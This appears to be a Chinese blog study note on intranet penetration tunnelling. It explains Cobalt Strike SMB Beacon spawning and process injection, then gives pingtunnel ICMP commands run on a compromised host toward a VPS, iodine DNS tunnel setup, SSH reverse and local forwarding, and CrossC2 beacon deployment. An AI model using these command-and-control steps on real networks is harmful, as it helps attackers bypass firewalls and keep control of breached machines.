一、基础知识

【内网安全-基础】基础知识、信息收集、工具

https://blog.csdn.net/qq_53079406/article/details/128292587?spm=1001.2014.3001.5501

【内网安全-防火墙】防火墙、协议、策略

https://blog.csdn.net/qq_53079406/article/details/128314938?spm=1001.2014.3001.5501

【内网安全-通讯&上线】通讯&上线基础知识

https://blog.csdn.net/qq_53079406/article/details/128320574?spm=1001.2014.3001.5501

二、隧道技术

1、简介：

1）是路由器把一种网络层协议封装到另一个协议中以跨过网络传送到另一个路由器的处理过程

————

2）隧道技术是一种数据包封装技术，它是将原始IP包（其报头包含原始发送者和最终目的地）封装在另一个数据包（称为封装的IP包）的数据净荷中进行传输

————

3）隧道技术上线：

HTTP/S & DNS & SSH & ICMP & SMB & 协议穿透等

除去SMB隧道外，其他隧道技术大部分针对的出站策略绕过（也就是最终传输的地方会转会原本的协议）

2、SMB隧道

1）SMB(全称是Server Message Block)是一个网络协议名，它能被用于Web连接和客户端与服务器之间的信息沟通

#判断：445端口

————

2）上线条件

1、目标主机（SMB Beacon）接受 445 端口连接（因此445端口成为判断能否使用的方法）

2、Beacon只能链接由同一个 CS生成的

3、具有管理员权限或管理员凭据

————

3）使用（工具cs）

1、创建SMB Beacon 监听器、生成木马

（用Windows可执行程序E，这里我试了试没用过的选项，stageless意为没有舞台）

2、派生会话SMB Beacon（右键选中HTTP监听器上线的主机，进入Beacon控制台，输入spawn加SMB Beacon的监听器名称）

（预计process为rundll32.exe的主机会派生会话）

（结果：新产生一个process为beacon.exe的派生会话）

3、注入进程上线SMB Beacon（将SMB Beacon注入到某个进程中；右键--目标--进程列表--Inject--选中Beacon）

（预计最后SMB Beacon，process会变为phpstudy的进程 ）

开了phpstudy做测试

（结果新产生了一个process为beacon.exe的）

3、ICMP隧道

1）ICMP隧道技术是一种数据包封装技术，它是将原始IP包封装在ICMP的数据净荷中进行传输（传到接收方的时候，再变回Tcp）

#判断：ping命令（ping命令waf、防火墙不屏蔽情况下可以穿透）

————

2）在ICMP通信协议中，通信双方不需要开放端口（ ping 命令）

———

3）ICMP协议项目：

https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel

———

4）使用：

VPS:

./pingtunnel -type server

（出现问题： ./ping 隧道: 拒绝许可）

肉鸡：

管理器运行（ICMP程序）

pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1（此处，监听本地6666端口，并转发到指定ip的7777端口）

——

CS:

监听器1：127.0.0.1 6666

监听器2：192.168.46.66 7777

生成监听器1的Stager后门肉鸡执行

4、DNS隧道

1）DNS：为了访问互联网和内网资源，DNS提供域名解析服务，将域名和IP地址进行转换

————

2）DNS隧道是将其他协议的内容封装在DNS协议中，然后以DNS请求和响应包完成传输数据(通信)的技术。当前网络世界中的DNS是一项必不可少的服务，所以防火墙和入侵检测设备将很难做到完全过滤掉DNS流量

#判断：nslookup dig

————

#工具：https://github.com/yarrick/iodine

iodine原理：通过TAP虚拟网卡，在服务端建立起一个局域网；在客户端，通过TAP建立一个虚拟网卡；两者通过DNS隧道连接，处于同一个局域网。在客户端和服务端之间建立连接后，客户机上会多出一块名为dns0的虚拟网卡

————

3）上线条件：

1、内网主机出网DNS协议数据

2、域名申请及配置

3、监听器创建及配置

4、后门绑定监听器及生成

———

4）上线：

1、内网主机出网DNS协议数据（解决通讯）

工具：https://github.com/yarrick/iodine

判断出网：nslookup www.baidu.com

——

2、服务器：设置密码并创建虚拟IP及绑定域名指向

iodined -f -c -P 密码 192.168.0.1 ns1.域名 -DD

设置密码并创建虚拟IP及绑定域名指向

——

3、客户端：连接密码并绑定域名指向

iodine -f -M 200 -P 密码 ns1.域名

-尝试通讯尝试连接：

ssh root@192.168.0.2

5、SSH协议

1）安全外壳协议（Secure Shell，简称SSH）是一种在不安全网络上用于安全远程登录和其他安全网络服务的协议

————

2）CS无SSH协议监听器配置，无法上线

————

3）通讯（SSH协议存在于Linux系统，跳板机必须Linux）：

iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口，一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口，一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */
开启ssh协议登录：
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart
本地：出站封
ssh -CfNg -L 1122:192.168.1.15:8080 root@192.168.1.166
curl http://127.0.0.1:1122
远程：入站封
ssh -CfNg -R 1234:192.168.1.15:8080 root@IP地址
curl http://127.0.0.1:1234

6、控制上线-插件

https://github.com/gloxec/CrossC2

面向Linux Mac IOS Android系统上线支持

————

目前版本只支持反向的https和正向的tcp

1、下载对应版本加载器和CNA插件

2、上传加载器文件和本地加载CNA插件

3、修改CNA插件配置路径及上传Key文件

4、使用命令或插件绑定HTTPS监听器生成